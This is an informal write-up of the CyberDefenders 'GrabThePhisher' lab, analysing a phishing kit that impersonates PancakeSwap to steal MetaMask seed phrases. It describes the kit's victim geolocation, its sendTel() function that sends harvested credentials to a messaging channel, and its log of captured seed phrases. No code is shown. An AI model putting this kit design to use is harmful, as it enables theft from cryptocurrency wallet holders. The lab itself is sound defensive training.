GrabThe Phisher - CyberDefender
After we unzip the file we get the following directories.
We can guess the phisher is trying to impersonate Pancakeswap website.
We can already see few interesting folders like, metamask, src and log.
Lets check out the "metamask", we get a HTML and PHP file.
We can see some important informations already from the .php file.
The "<="tag is called short open tag in PHP. To use the short tags,
one must have to enable it from settings in the PHP. ini file.
The code suggests the phisher used sypexgeo.net/ to grab the target/victim machine info.
Down the line, the function sendTel() we get bunch of juicy information to track
the phisher like, ID, TOKEN, and the messaging channel for credential dump.
PhishKit developer also logs the entry data in a typical file log.txt which we can easily get an
idea on the presence of a folder named log in the starting directory.
Checking the folder, we have 3 line of 12 word seed phrase.
To trace the phisher with the informations on the kit code, we need to write down a
simple script that evokes detailed info about the phisher..
Get code here.
There result of the script looks something like;.
The end. :)